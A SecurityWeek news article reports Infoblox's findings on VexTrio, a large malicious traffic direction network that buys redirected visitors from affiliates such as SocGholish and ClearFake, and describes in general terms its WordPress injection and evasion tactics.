Connect with us

Hi, what are you looking for?



Cybercrime’s Silent Operator: The Unraveling of VexTrio’s Malicious Network Empire

VexTrio is a traffic direction system (TDS) with more than 60 affiliates feeding an unknown number of malicious campaigns.

DDos Attacks

VexTrio is a massive and complex malicious TDS (traffic direction system) organization. It has a network of more than 60 affiliates that divert traffic into VexTrio, while it also operates its own TDS network. While aspects of the operation have been discovered and analyzed by different researchers, the core network has remained largely unknown.

Two of the affiliates, for example, are ClearFake and SocGholish — both known through their malware. VexTrio, however, is purely a traffic broker not tied to or recognized by any malware. 

Infoblox, a network visibility and control firm, has been tracking VexTrio for nearly two years, but has only more recently come to understand the extent of the operations. Its report published today describes the size and pervasiveness of the organization.

There appears to be a stable relationship between affiliates and VexTrio: SocGholish has partnered with VexTrio for nearly two years at least, while ClearFake has had such a partnership throughout its lifetime.

A TDS system is commonly used to connect visitors and targeted advertising based on discovered characteristics of the visitor. A malicious TDS uses the same principles to connect visitors and malicious websites or pages. This is commonly achieved by compromising websites — very often WordPress sites — and injecting malicious code into the site. The code can discover characteristics of the visitor before selecting the next action. 

Each of the affiliates have their own TDS network. Some simply send the details to VexTrio. Others will use some of the opportunities and send the rest to VexTrio, depending on the visitor. For example, notes the report, “SocGholish only targets Windows OS users that are first-time visitors, according to their User-Agent, IP address, and browser cookies. For visitors that are incompatible with SocGholish exploitation methods (eg, macOS devices), the actors will still capitalize on the web traffic by redirecting them to VexTrio TDS servers.”

The most common method of collecting traffic used by the affiliates is a drive-by compromise targeting vulnerable WordPress sites. Malicious JavaScript is injected into the HTML pages. The complexity of the JavaScript varies between the affiliates, but it typically acts as a redirect to VexTrio servers. It is not unknown for a single site to be compromised by multiple affiliates. In this case, VexTrio rewards the affiliates on a first come, first served basis.

VexTrio consequently combines traffic from multiple affiliates with traffic garnered from its own TDS network. Sometimes it may use this traffic in its own malicious campaigns, but will otherwise sell the details to other actors for separate malware, phishing, or various scam purposes.

Advertisement. Scroll to continue reading.

VexTrio has become a major broker in the criminal underworld. It comprises more than 70,000 known domains, nearly half of which Infoblox has observed within its own customers. “We have seen VexTrio activity in as much as 19% of networks on a single day since 2020, and in over half of all customer networks in the last two years,” comment the researchers.

Image Credit: Infoblox

There is always a cat and mouse game between cybercriminals and security defenders. VexTrio has been a prolific actor using DNS to carry out attacks across the globe. DNS leaves a heavy footprint in network logs. This may not stop an operation but allows researchers to study the attacker. Recently, notes Infoblox, VexTrio has migrated a large portion of its infrastructure to shared hosting providers, making them more difficult – but not impossible – to track. 

Another method designed to avoid researchers is a delay between compromise and effect. The researchers purposely activated a VexTrio campaign known as robot Captcha, with no immediate effect. But, “After waiting 24 hours and performing a system reboot,” note the researchers, “our test machine received many push notifications disguised as messages from McAfee.”

The complex business model operated by VexTrio has enabled it to remain nameless for the last six years. It is now known. That same complexity, however, makes it very resilient and difficult to take down.

Related: BlackBerry Researchers Dive Into Prometheus TDS Operations

Related: Cybercrime Gang Uses Screenlogger to Identify High-Value Targets

Related: Microsoft Warns of Cybercrime Group Delivering Royal Ransomware

Related: Neutrino, RIG Using Blackhat-TDS for Redirection

Written By

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.


Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Learn about active threats targeting common cloud deployments and what security teams can do to mitigate them.


Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.


Expert Insights

Related Content


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...


Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.


Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.


Satellite TV giant Dish Network confirmed that a recent outage was the result of a cyberattack and admitted that data was stolen.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.


Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.